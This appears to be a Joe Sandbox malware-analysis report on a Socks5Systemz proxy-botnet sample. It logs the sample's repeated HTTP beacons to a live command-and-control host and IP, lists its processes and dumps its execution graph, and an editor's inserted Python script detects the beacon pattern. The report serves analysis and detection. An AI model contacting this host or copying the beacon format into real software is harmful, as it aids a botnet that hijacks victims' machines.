Dec 14, 2024 03:03:52.722951889 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:53.218858004 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49951 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:03:53.453154087 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:54.800787926 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:54.910211086 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:55.411422014 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49957 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:03:55.655803919 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:57.005861044 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49962 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:03:57.233951092 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:58.578170061 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49966 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:03:58.814621925 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:04:00.162966013 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49972 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:04:00.407417059 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:04:01.756186008 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:04:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49976 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:04:01.986165047 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:04:03.336361885 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:04:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 35 30 61 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 38 30 61 34 38 39 65 34 65 31 37 64 61 66 30 61 32 38 63 62 64 62 61 32 37 63 61 36 37 36 30 37 63 35 30 63 36 64 32 34 66 64 63 34 61 34 32 64 32 34 37 39 65 34 35 65 64 34 64 65 32 62 33 66 36 34 65 39 38 35 64 39 33 33 63 31 66 39 62 32 36 39 64 35 38 39 38 39 61 32 32 32 34 36 34 34 39 61 31 32 31 32 30 37 32 63 38 39 65 36 33 33 33 38 39 38 61 64 62 32 62 35 38 35 32 38 65 63 35 30 37 66 66 31 33 63 34 64 63 35 63 62 33 32 36 33 34 31 36 35 31 64 35 35 65 32 30 64 64 34 31 66 61 33 62 39 64 34 62 34 30 61 34 32 38 65 61 61 35 31 61 39 62 35 64 34 36 61 34 62 36 62 64 38 63 66 66 63 39 61 32 35 37 65 61 66 61 62 37 39 38 64 66 32 64 33 61 38 61 30 62 62 63 33 31 65 66 36 66 31 38 61 31 62 64 36 30 61 64 30 62 64 35 62 36 37 38 39 38 31 34 61 34 63 63 39 35 32 36 34 62 39 65 62 39 63 66 32 64 39 39 65 32 39 63 65 31 31 38 66 31 34 63 64 66 35 33 32 66 63 35 32 31 61 66 39 62 32 [TRUNCATED]
Data Ascii: 50ade2fe88e261d4749b96478393969f80739f80a489e4e17daf0a28cbdba27ca67607c50c6d24fdc4a42d2479e45ed4de2b3f64e985d933c1f9b269d58989a22246449a1212072c89e6333898adb2b58528ec507ff13c4dc5cb326341651d55e20dd41fa3b9d4b40a428eaa51a9b5d46a4b6bd8cffc9a257eafab798df2d3a8a0bbc31ef6f18a1bd60ad0bd5b6789814a4cc95264b9eb9cf2d99e29ce118f14cdf532fc521af9b2 [TRUNCATED]
Dec 14, 2024 03:04:03.336420059 CET | 262 | IN | Data Raw: 35 33 34 33 30 66 63 38 32 31 30 32 65 64 65 31 33 36 37 66 35 62 30 31 33 39 33 33 35 62 32 66 37 34 62 38 63 30 66 36 36 39 31 64 39 64 34 36 30 64 61 37 39 62 64 38 66 63 33 31 30 35 61 61 34 64 34 38 38 36 64 37 36 66 35 37 62 66 37 36 66 61
Data Ascii: 53430fc82102ede1367f5b0139335b2f74b8c0f6691d9d460da79bd8fc3105aa4d4886d76f57bf76faca9f1d3ec9c1a403f3a807941bc777ca3a97161551383ad0669fb6031ab9973f4ae41706475fe682478becf146043f5c3cb9af7ea9516e06d3962d4bc4fc9b43929c4e449efd754ed3baf9c534e08c61e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49982 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:04:03.708288908 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:04:05.046397924 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:04:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49986 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:04:05.282936096 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:04:06.630875111 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:04:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
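The sessions above are the sample's C2 beacon: a fresh TCP connection every couple of seconds to bhdmpwg.com on port 80, always the same 303-byte GET /click/?counter=<hex> with an unchanging counter value, a User-Agent claiming "Windows NT 9.0" (a kernel version that never shipped), and a 220-byte chunked reply carrying a short hex token. The triage script below is an added example written by the editor; it is not code from the Joe Sandbox report or from the malware. It parses constructed request records modelled on the rows above (the six C2 rows reuse the host, counter, timestamps, source ports and sizes shown; the example.com control row is invented) and flags those traits per Host header. The REAL_NT_VERSIONS table and the 60-second interval threshold are the editor's assumptions.

```python
"""Beacon triage over HTTP request records shaped like the Joe Sandbox rows.

Editor's example, not report or malware code.  Flags: a User-Agent naming a
Windows NT version that never existed, a /click/?counter=<hex> GET whose
counter never changes across fresh connections, and a short steady interval.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import median
from typing import Dict, List, NamedTuple, Optional

# Windows NT versions that real browsers advertise (editor's list, an
# assumption).  "Windows NT 9.0", as seen in the capture, was never released.
REAL_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}

UA_NT_RE = re.compile(r"Windows NT (\d+\.\d+)")
COUNTER_RE = re.compile(r"^/click/\?counter=([0-9a-f]{64,})$")


class Request(NamedTuple):
    ts: datetime
    src_port: int
    size: int
    host: str
    path: str
    user_agent: str


def parse_record(line: str) -> Request:
    """Parse 'timestamp<TAB>src_port<TAB>bytes<TAB>host<TAB>path<TAB>user_agent'.
    The report prints nanoseconds; %f takes at most six digits, so truncate."""
    ts, port, size, host, path, ua = line.rstrip("\n").split("\t")
    head, frac = ts.split(".")
    when = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return Request(when, int(port), int(size), host, path, ua)


def impossible_nt_version(user_agent: str) -> bool:
    """True when the UA claims a Windows NT version that never existed."""
    m = UA_NT_RE.search(user_agent)
    return m is not None and m.group(1) not in REAL_NT_VERSIONS


def triage(records: List[Request], max_interval_s: float = 60.0) -> Dict[str, dict]:
    """Group requests by Host and score beacon-like behaviour per host.
    Beacon = impossible UA, or >= 3 requests with one fixed counter value at a
    median spacing below max_interval_s (60 s is an assumed threshold)."""
    by_host: Dict[str, List[Request]] = defaultdict(list)
    for r in records:
        by_host[r.host].append(r)

    results: Dict[str, dict] = {}
    for host, reqs in by_host.items():
        reqs.sort(key=lambda r: r.ts)
        matches = [COUNTER_RE.match(r.path) for r in reqs]
        # Every request matches and the opaque counter is identical each time,
        # even though the source port (i.e. the TCP connection) keeps changing.
        static_query = all(matches) and len({m.group(1) for m in matches}) == 1
        gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(reqs, reqs[1:])]
        med: Optional[float] = median(gaps) if gaps else None
        bogus_ua = any(impossible_nt_version(r.user_agent) for r in reqs)
        periodic = static_query and len(reqs) >= 3 and med is not None and med < max_interval_s
        results[host] = {
            "request_count": len(reqs),
            "distinct_src_ports": len({r.src_port for r in reqs}),
            "identical_sizes": len({r.size for r in reqs}) == 1,
            "bogus_user_agent": bogus_ua,
            "static_counter_query": static_query,
            "median_interval_s": med,
            "verdict": "beacon" if (bogus_ua or periodic) else "benign",
        }
    return results


# Constructed records: the first six mirror the OUT rows of sessions 25-27
# (host, counter, timestamps, source ports, 303-byte size); the seventh is an
# invented benign control carrying a real Windows NT version.
C2_COUNTER = "de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24"
C2_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
BENIGN_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SAMPLE_LOG = [
    f"Dec 14, 2024 03:03:45.671370029\t49930\t303\tbhdmpwg.com\t/click/?counter={C2_COUNTER}\t{C2_UA}",
    f"Dec 14, 2024 03:03:47.128827095\t49930\t303\tbhdmpwg.com\t/click/?counter={C2_COUNTER}\t{C2_UA}",
    f"Dec 14, 2024 03:03:47.859289885\t49936\t303\tbhdmpwg.com\t/click/?counter={C2_COUNTER}\t{C2_UA}",
    f"Dec 14, 2024 03:03:49.316361904\t49936\t303\tbhdmpwg.com\t/click/?counter={C2_COUNTER}\t{C2_UA}",
    f"Dec 14, 2024 03:03:49.925767899\t49936\t303\tbhdmpwg.com\t/click/?counter={C2_COUNTER}\t{C2_UA}",
    f"Dec 14, 2024 03:03:50.656239986\t49944\t303\tbhdmpwg.com\t/click/?counter={C2_COUNTER}\t{C2_UA}",
    f"Dec 14, 2024 03:03:46.000000000\t50001\t412\texample.com\t/index.html\t{BENIGN_UA}",
]


def triage_sample() -> Dict[str, dict]:
    """Run the triage over the constructed records."""
    return triage([parse_record(line) for line in SAMPLE_LOG])


if __name__ == "__main__":
    for host, verdict in triage_sample().items():
        print(host, verdict)
```

The impossible-UA check is the cheapest signature here: a hard-coded string like "Windows NT 9.0" never appears in legitimate browser traffic, so it needs no baseline. The periodicity and static-counter checks are the fallback for the same family with a corrected UA, and they read only fields a proxy or flow log already records (timestamp, source port, Host, path, request size), so they can run over production HTTP logs, not just a sandbox capture.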



                                                                        Target ID:0
                                                                        Start time:21:01:59
                                                                        Start date:13/12/2024
                                                                        Path:C:\Users\user\Desktop\j9htknb7BQ.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\j9htknb7BQ.exe"
                                                                        Imagebase:0x400000
                                                                        File size:7'246'011 bytes
                                                                        MD5 hash:168A4450EAF205FA20BCC2D0881C830F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:1
                                                                        Start time:21:01:59
                                                                        Start date:13/12/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe"
                                                                        Imagebase:0x400000
                                                                        File size:704'000 bytes
                                                                        MD5 hash:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:3
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\schtasks.exe" /Query
                                                                        Imagebase:0x210000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                                                                        Imagebase:0x400000
                                                                        File size:2'199'540 bytes
                                                                        MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\system32\net.exe" helpmsg 10
                                                                        Imagebase:0xbc0000
                                                                        File size:47'104 bytes
                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                                                                        Imagebase:0x400000
                                                                        File size:2'199'540 bytes
                                                                        MD5 hash:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:21:02:01
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:21:02:02
                                                                        Start date:13/12/2024
                                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\net1 helpmsg 10
                                                                        Imagebase:0x10000
                                                                        File size:139'776 bytes
                                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:21.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.4%
                                                                          Total number of Nodes:1498
                                                                          Total number of Limit Nodes:22
408fac 5975->5994 5979 403278 4 API calls 5978->5979 5980 4032b5 5979->5980 5980->5965 5982 403498 5981->5982 5984 4034c3 5981->5984 5983 4034f0 4 API calls 5982->5983 5983->5984 5984->5965 5986 408f7a 5985->5986 5987 408f7e 5985->5987 5986->5971 5988 408fa0 SetLastError 5987->5988 5989 408f87 Wow64DisableWow64FsRedirection 5987->5989 5990 408f9b 5988->5990 5989->5990 5990->5971 5992 4069dc 7 API calls 5991->5992 5993 406a52 GetLastError 5992->5993 5993->5975 5995 408fb1 Wow64RevertWow64FsRedirection 5994->5995 5996 408fbb 5994->5996 5995->5996 5996->5884 5998 403198 4 API calls 5997->5998 6004 408cb1 5997->6004 5998->6004 5999 408cdc 6000 4031b8 4 API calls 5999->6000 6002 408d69 6000->6002 6001 408cc8 6005 4032fc 4 API calls 6001->6005 6002->5697 6003 403278 4 API calls 6003->6004 6004->5999 6004->6001 6004->6003 6006 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6004->6006 6005->5999 6006->6004 6008 406744 IsDBCSLeadByte 6007->6008 6010 406835 6008->6010 6009 40687f 6009->5709 6010->6009 6011 406680 IsDBCSLeadByte 6010->6011 6011->6010 6013 4068f3 6012->6013 6014 406820 IsDBCSLeadByte 6013->6014 6016 4068fe 6014->6016 6015 4066ea 6015->5714 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 406957 6018->6019 6020 40695b 6018->6020 6019->5728 6023 406970 CharPrevA 6020->6023 6022 40696c 6022->5728 6023->6022 6025 402bd5 RaiseException 6024->6025 6026 402be6 6024->6026 6025->6026 6026->5752 6279 402e64 6280 402e69 6279->6280 6281 402e7a RtlUnwind 6280->6281 6282 402e5e 6280->6282 6283 402e9d 6281->6283 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6713 403f7d 6714 403fa2 6713->6714 6717 403f84 6713->6717 6716 403e8e 4 API calls 6714->6716 6714->6717 6715 403f8c 6716->6717 6717->6715 6718 402674 4 API calls 6717->6718 6719 403fca 6718->6719 6726 403d02 6733 403d12 6726->6733 6727 403ddf ExitProcess 6728 403db8 6730 403cc8 4 API calls 6728->6730 6729 403dea 6731 403dc2 6730->6731 6732 403cc8 4 API calls 6731->6732 6734 403dcc 
6732->6734 6733->6727 6733->6728 6733->6729 6733->6733 6736 403da4 6733->6736 6737 403d8f MessageBoxA 6733->6737 6746 4019dc 6734->6746 6742 403fe4 6736->6742 6737->6728 6739 403dd1 6739->6727 6739->6729 6743 403fe8 6742->6743 6744 403f07 4 API calls 6743->6744 6745 404006 6744->6745 6747 401abb 6746->6747 6748 4019ed 6746->6748 6747->6739 6749 401a04 RtlEnterCriticalSection 6748->6749 6750 401a0e LocalFree 6748->6750 6749->6750 6751 401a41 6750->6751 6752 401a2f VirtualFree 6751->6752 6753 401a49 6751->6753 6752->6751 6754 401a70 LocalFree 6753->6754 6755 401a87 6753->6755 6754->6754 6754->6755 6756 401aa9 RtlDeleteCriticalSection 6755->6756 6757 401a9f RtlLeaveCriticalSection 6755->6757 6756->6739 6757->6756 6310 404206 6311 40420a 6310->6311 6312 4041cc 6310->6312 6313 404282 6311->6313 6314 403154 4 API calls 6311->6314 6315 404323 6314->6315 6316 402c08 6319 402c82 6316->6319 6320 402c19 6316->6320 6317 402c56 RtlUnwind 6318 403154 4 API calls 6317->6318 6318->6319 6320->6317 6320->6319 6323 402b28 6320->6323 6324 402b31 RaiseException 6323->6324 6325 402b47 6323->6325 6324->6325 6325->6317 6326 408c10 6327 408c17 6326->6327 6328 403198 4 API calls 6327->6328 6336 408cb1 6328->6336 6329 408cdc 6330 4031b8 4 API calls 6329->6330 6332 408d69 6330->6332 6331 408cc8 6334 4032fc 4 API calls 6331->6334 6333 403278 4 API calls 6333->6336 6334->6329 6335 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6335->6336 6336->6329 6336->6331 6336->6333 6336->6335 6337 40a011 6338 40a036 6337->6338 6339 407918 InterlockedExchange 6338->6339 6341 40a060 6339->6341 6340 40a070 6347 4076ac SetEndOfFile 6340->6347 6341->6340 6342 409aa0 4 API calls 6341->6342 6342->6340 6344 40a08c 6345 4025ac 4 API calls 6344->6345 6346 40a0c3 6345->6346 6348 4076c3 6347->6348 6349 4076bc 6347->6349 6348->6344 6350 40748c 21 API calls 6349->6350 6350->6348 6762 409916 6763 409918 6762->6763 6764 40993a 6763->6764 6765 409956 CallWindowProcA 6763->6765 6765->6764 6078 407017 6079 407008 
